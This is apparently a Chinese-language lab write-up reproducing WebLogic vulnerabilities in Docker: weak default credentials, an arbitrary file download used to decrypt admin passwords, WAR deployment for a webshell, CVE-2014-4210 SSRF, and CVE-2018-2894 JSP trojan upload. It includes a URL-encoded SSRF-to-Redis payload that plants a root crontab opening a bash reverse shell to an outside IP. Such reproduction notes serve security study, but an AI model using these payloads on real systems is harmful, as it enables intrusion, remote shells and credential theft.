weblogic漏洞從0學習復現

這兩天慢慢復現完weblogic的漏洞

weblogic的歷史漏洞

#控制檯路徑泄露
Weakpassword  

#SSRF：
CVE-2014-4210   

#JAVA反序列化：
CVE-2015-4852：Weblogic 直接反序列化，是基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞

CVE-2016-0638：Weblogic 直接反序列化，基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞，漏洞實爲 CVE-2015-4852 繞過 拜 Oracle 一直以來的黑名單修復方式所賜

CVE-2016-3510：基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞

CVE-2017-3248：基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞 屬於 Weblogic JRMP 反序列化

CVE-2018-2628：基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞 屬於 Weblogic JRMP 反序列化

CVE-2018-2893：基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞 實爲 CVE-2018-2628 繞過

CVE-2019-2725

漏洞涉及版本
10.3.6.0 
12.1.3.0
12.2.1.2
12.2.1.3

#任意文件上傳
CVE-2018-2894   

#XMLDecoder反序列化：
CVE-2017-10271 
CVE-2017-3506

控制檯路徑泄露 之弱口令/任意文件漏洞復現

docker搭建完成之後

訪問地址爲:http://127.0.0.1:7001/console/login/LoginForm.jsp

weblogic弱口令有以下幾種：

system:password
weblogic:weblogic
admin:secruity
joe:password
mary:password
system:sercurity
wlcsystem:wlcsystem
weblogic:Oracle@123

自己利用的時候都是直接通過burpsuite的Intruer模塊的Pitchfork進行爆破的~

爆破方法發現任意文件下載的漏洞爲：http://your-ip:7001/hello/file.jsp?path=

下載./security/SerializedSystemIni.dat和./config/config.xml兩個文件來進行破解後臺用戶名和密碼。
[Weblogic 密碼使用 AES（老版本 3DES）加密，對稱加密可解密，只需要找到用戶的密文與加密時的密鑰即可。]

然後登陸weblogic後臺 進行遠程部署war包 從而拿到webshell

---

CVE-2014-4210之SSRF漏洞復現

訪問地址：http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp

漏洞URL：http://120.79.66.58:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=你要探測的地址&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

細節：這裏的探測ip必須是內網ip、如果寫127.0.0.1的話 是探測失敗的

基於ssrf的redis未授權訪問攻擊payload：http://xxxxxxxxxxxx.com/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F120.79.66.58%2F4445%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

---

Java反序列化

相關歷史漏洞簡介

CVE-2015-4852：Weblogic 直接反序列化，是基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞

CVE-2016-0638：Weblogic 直接反序列化，基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞，漏
洞實爲（ CVE-2015-4852 的繞過） 拜 Oracle 一直以來的黑名單修復方式所賜



CVE-2016-3510：基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞



CVE-2017-3248：基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞 屬於 Weblogic JRMP 反序列化



CVE-2018-2628：基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞 屬於 Weblogic JRMP 反序列化

CVE-2018-2893：基於 Weblogic t3 協議引起遠程代碼執行的反序列化漏洞（實爲 CVE-2018-2628 繞過）



CVE-2019-2725

(1)利用現有的nmap腳本進行檢測目標是否使用了T3協議

nmap -n -v -p 7001，目標地址 --script=weblogic-t3-info

利用方法：Github瞭解下

---

CVE-2018-2894之任意文件上傳漏洞

一些必要的配置：

這個功能在啓動測試功能下才能驗證成功

在 CVE-2018-2894 環境目錄下，查看賬號密碼，運行以下命令： docker-compose logs | grep password 進入後臺登錄地址，輸入賬號密碼登錄。 勾選在“base_domain”下的“高級”下的“啓用 Web 服務測試頁”這個選項，最後點擊保存。

實現步驟

1、首先進入未經授權的上傳界面：http://your-ip/ws_utc/config.do

2、將“通用”下的“當前工作目錄”路徑設置爲： /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css（設置該目錄的目的：將目錄設置爲 ws_utc 應用的靜態文件 css 目錄，訪問這個目錄是無需權限的）

3、上傳木馬：進入“安全”，點擊“添加”，點擊“瀏覽…”，選擇你要上傳的 JSP 木馬，點擊“提交”，成功上傳 JSP 木馬。
按鍵“F12”，選中上傳文件名元素，該標籤下有個 id 元素，保存這個時間戳ID。

利用連接工具訪問剛剛上傳的木馬：
訪問地址 http://your-ip:7001/ws_utc/css/config/keystore/時間戳 id_文件名

---

XML Decoder 反序列化漏洞

CVE-2017-3506
CVE-2017-10271 （對CVE-2017-3506修復補丁的一次繞過）

小技巧快速定位：locate bea_wls_internal